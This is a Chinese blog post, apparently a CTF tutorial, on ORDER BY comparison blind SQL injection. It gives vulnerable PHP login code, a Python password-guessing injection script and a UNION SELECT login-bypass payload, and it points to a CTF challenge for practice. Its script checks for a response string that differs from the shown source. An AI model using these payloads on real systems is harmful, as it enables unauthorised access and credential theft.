sql order by 大小比较盲注

最新推荐文章于 2022-02-27 11:34:10 发布
最新推荐文章于 2022-02-27 11:34:10 发布
阅读量1k 收藏 1
点赞数 2
文章标签: python mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/104908543
版权

利用场景,先判断用户名再判断密码

 $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if(isset($row) && $row['username'] === 'admin'){
        if ($row['password']===md5($password)){
            echo "Login successful";
        }else{
            die("password error!");
        }
    }else{
        die("username error!");
    }

有如下表
在这里插入图片描述
我们尝试用order by去猜测password的值
在这里插入图片描述
这里很明显能看出来,当用联合查询出来的password值是1和2时,最终选择出来的就是1,2(挑选出来第一行),页面会显示用户名错误,当为3时则选择出来的是真正的用户名admin,这时显示的是密码错误,这样我们就可以根据回显一位一位的猜解password的值。
给出一个通用的脚本,大家可以根据过滤情况进行修改。

s = '0123456789:abcdefghijklmnopqrstuvwxyz{'
password=''
for i in range(50):
    for j in s:
        l=password+j
        data={
            'username':"'or 1 union select 1,'"+l+"' order by 2#",
            'password':''
            }
        r=requests.post(url,data=data)
        if "wrong pass!" in r.text:
            password+=chr(ord(j)-1)
            print(password)
            break

当然还有一个小技巧绕过

因为源码中要判断输入的密码的md5值与查询出来的密码是否一致。
这里直接构造
payload:username=' union select 'admin','c81e728d9d4c2f636f067f89cc14862c' #&password=123
其中c81e728d9d4c2f636f067f89cc14862c为123的md5值

大家可以参考 GXYCTF2019-BabySQli 进行练习。

yu22x
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
利用order by 进行盲注
aiquan9342的博客
10-21 222
0x01 利用场景 登录代码: $username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql="SELECT * FROM admin WHERE username='".$username."'"; ...
sql排序order by
qq_42833608的博客
10-09 379
弄个表造点数据,方便对照进行判断 order by 关键字用于排序查询 默认按照升序(asc)进行排列 降序要使用 desc 排序方式:数字按照大小 英文字母和汉字按照第一个字母 从 a~z 排列 语 法: select 表中字段 表名 order by 表中字段 asc/desc 将test 表中数据按照姓名进行升序排序 将test 表中 id,name,sex 字段对应的数据按照姓...
面向CSDN编程之:数据库字符串类型按数值大小排序(order by)
遇见你是我最美丽的意外
01-22 1804
数据库字符串类型按数值大小排序(order by) 1. 需求 别人提供了一个数据库中的表,需要对某一列进行排序。 这个问题直接使用order by命令可以,不过由于不是数值类型,导致按ASCII码顺序进行排序。比如说:在表中我使用string类型存储年龄age,然后根据age进行排序: 可以看出,根本不是按数值大小排序的。 2. 解决方法 使用cast命令转换数据类型。 ...
结合order by 解CTF某题
aiquan9342的博客
10-21 213
真tmd不容易 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" typ...
varchar类型的数字比较大小
myme95的博客
05-21 1万+
varchar类型的数字在mysql比较大小,或者用order by 排序的话,有时候会失效 最好的方法是转成float类型再进行比较 用cast(字段名 as 类型)函数做转换 如varchar类型的字段price,它要进行由低到高的排序,为了保证准确性,应该是这样写 order by cast(price as decimal) asc 注:在mysql中decimal即为flo...
SQL注入手动盲注案例
05-30
### SQL注入手动盲注案例详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
5. **ORDER BY**:对查询结果进行排序,如`select * from news order by $id`或`select id,name,price from news order by $order`。攻击者可能通过调整$order$获取不同顺序的信息。 **报错盲注**: 在没有回显的...
CTF中几种通用的sql盲注手法和注入的一些tips1
08-03
本文将深入探讨几种通用的SQL盲注手法,并提供一些实战中的技巧。 首先,我们来看一下XOR注入。这种方法利用了异或(XOR)运算的特性,其中两个相同的值进行异或运算结果为0,而不同值异或结果为1。例如,payload `...
postgresql盲注+比较简单方法
08-05
- 猜测字段数:通过添加`orderby`语句尝试不同的数字,如`orderby15--`正常和`orderby16--`错误,表明字段数是15。 - 确定可利用的SQL语句:在尝试使用`UNION SELECT`时,如果返回错误,说明这个语句不能使用。 - ...
sql注入讲解ppt.pptx
08-10
3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. 注入点测试:检测 SQL 注入的可能性。 2. 查询字段数:...
SQL语句之排序查询--ORDER BY(order by)
traveler-leon的博客
04-20 2万+
sql语句select之排序查询(order by) 语法: select 查询列表 from 表 (where 筛选条件) order by 排序列表 [asc:升序,desc降序] 例: select * from employees order by salary desc; 目的:从employees 表中,按照salary,从高到低排序 例: select * from employees where department_id >= 90 order by hiredate asc; 目
mysqlorderby数字字符串排序_mysql将字符串字段转为数字排序或比大小
weixin_42525738的博客
01-14 3684
mysql里面有个坑就是,有时按照某个字段的大小排序(或是比大小)发现排序有点错乱。后来才发现,是我们想当然地把对字符串字段当成数字并按照其大小排序(或是比大小),结果肯定不会是你想要的结果。这时候需要把字符串转成数字再排序。最简单的办法就是在字段后面加上+0如把'123'转成数字123(以下例子全为亲测):排序:例:方法一:ORDER BY '123'+0;(首推)方法二:ORDER BYCA...
数据库优化-排序篇 (order by)
学习真香
02-27 3629
数据库优化-排序篇 (order by) 背景 日常开发工作中, 经常使用order by对结果集进行排序, 但是对其原理和具体实现可能不是很了解. 这样无法进行有效的分析和针对性优化. 因此, 我写下本篇文章介绍一下 order by的基本原理和一些工作中常见的问题. 带着问题去学习, 效率会更高, 更有趣. 数据准备 因为在工作中使用pg多一些, 所以文中的数据库选择了 PostgreSQL 11.14 64-bit 造一些测试数据, 可以参考: pg 快速造1000w测试数据 CREATE TABLE
sql,查询结果按照数字大小顺序排序,并且null字段排在最后
qq_39822451的博客
06-26 1657
order by a.sort is null, a.sort+0 ASC
java sql排序数字大小排序_如何用sql实现自己想要的order排序
weixin_32287177的博客
02-28 742
一、需求背景万恶的产品经理,在不同场景有不同的排序需求,有时候根据字段 0 1 2 升序 ,有时候又是1 2 0 这样排序,重点是还要分页,就无法使用代码去实现排序,只能用纯sql语句。假设现在有一个订单表,表里有个字段为pay_status,0为未支付,1为已支付,2为支付失败如果按照支付失败->已支付->未支付(2,1,0)排序,使用以下sql语句即可select * from ...
mysql按数字大小排序函数_SQL里的查询结果怎么才能按照中文数字大小排序?
weixin_26516551的博客
01-19 756
你的位置:问答吧-> 数据库-> 问题详情SQL里的查询结果怎么才能按照中文数字大小排序?有一个字段jb的内容是:一级二级三级四级五级六级这样的。我想在查询的结果中按照级别从小到大的顺序排序,但是如果简单的用order by jb,那么得到的顺序就是:二级,六级,三级,四级,五级,一级这个顺序,是按汉字的拼音首...
SQL字符型字段按数字型字段排序实现方法
热门推荐
chenaini119的专栏
06-22 3万+
得分字段为varchar 那么按得分排序得到的结果可能是: 1 10 11 123 1234 2 25 253 3 但是我们想要按照数字排序 1 2 3 10 11 25 123 1234 253这时候只需要 一种 、 数字字符串为01 0100 02 0200 一排序就是这个顺序,我想要变成01 02 0100 0200 就用下面这个办法 把这个字段转
如何让SQLServer的 itemNum 字段 按照数字大小顺序排序
xuanjiewu的专栏
08-01 8233
我的 itemNum 从1到20,可是超过了SQLServer的默认排序这样的 1 10 11 12 . . . 19 2 3 4 5 6 7 如何才能让排序成为这样 1 2 3 4 5 6 7 8 9 10 11 . . . 解决办法:因为 itemNum 是 VARCHAR 字符串类型,要按数字大小排序需要将它转换为 INT 类型
SQL order by
最新发布
06-14
SQL中,`ORDER BY`是一个用于对查询结果进行排序的关键字。它允许你在查询数据时按照一个或多个列的值进行升序(ASC,默认)或降序(DESC)排列。`ORDER BY`通常放在`SELECT`语句的末尾,语法如下: ```sql ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值